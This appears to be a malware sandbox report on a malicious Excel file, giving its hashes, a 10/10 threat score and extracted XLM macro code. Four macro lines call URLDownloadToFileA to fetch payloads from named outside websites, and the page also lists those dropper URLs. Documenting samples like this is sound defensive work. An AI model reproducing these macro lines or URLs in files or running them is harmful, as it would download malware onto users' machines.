Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

8

3c1aea9f7c...03.xls

windows7-x64

10

3c1aea9f7c...03.xls

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    3c1aea9f7c029c6d1560af5cbd680746b4b99382001485732f28bc770611b103

  • Size

    67KB

  • Sample

    241120-2kplhavbng

  • MD5

    4ca50d67a7178b9c58cdb91b5bff281d

  • SHA1

    47961da73c3aaf70d910251ef4ec507765f59190

  • SHA256

    3c1aea9f7c029c6d1560af5cbd680746b4b99382001485732f28bc770611b103

  • SHA512

    c2dca9a8ddcf339f0d08ce8e4d8c0b102a2fac44e9d6983058db343ad169f8e509dec4d7512fb767ae15afaa9dedec18cc8c657d34304b86519b4e327fcb9b7e

  • SSDEEP

    1536:nVKpb8rGYrMPe3q7Q0XV5xtezE8vG8UM+u9s1a6YG2jzQ0viPvDNHhGtg:VKpb8rGYrMPe3q7Q0XV5xtezE8vG8UMI

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Language
xlm4.0
Source
1
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://www.melisetotoaksesuar.com/catalog/controller/account/dqfKI/", "..\uxevr1.ocx")
2
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://elamurray.com/athletics-carnival-2018/3UTZYr9D9f/", "..\uxevr2.ocx")
3
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://masyuk.com/581voyze/MlX/", "..\uxevr3.ocx")
4
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://jr-software-web.net/aaabackupsqldb/11hYk3bHJ/", "..\uxevr4.ocx")
URLs
xlm40.dropper

https://www.melisetotoaksesuar.com/catalog/controller/account/dqfKI/
xlm40.dropper

http://elamurray.com/athletics-carnival-2018/3UTZYr9D9f/
xlm40.dropper

http://masyuk.com/581voyze/MlX/
xlm40.dropper

http://jr-software-web.net/aaabackupsqldb/11hYk3bHJ/

Targets

    • Target

      3c1aea9f7c029c6d1560af5cbd680746b4b99382001485732f28bc770611b103

    • Size

      67KB

    • MD5

      4ca50d67a7178b9c58cdb91b5bff281d

    • SHA1

      47961da73c3aaf70d910251ef4ec507765f59190

    • SHA256

      3c1aea9f7c029c6d1560af5cbd680746b4b99382001485732f28bc770611b103

    • SHA512

      c2dca9a8ddcf339f0d08ce8e4d8c0b102a2fac44e9d6983058db343ad169f8e509dec4d7512fb767ae15afaa9dedec18cc8c657d34304b86519b4e327fcb9b7e

    • SSDEEP

      1536:nVKpb8rGYrMPe3q7Q0XV5xtezE8vG8UM+u9s1a6YG2jzQ0viPvDNHhGtg:VKpb8rGYrMPe3q7Q0XV5xtezE8vG8UMI

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.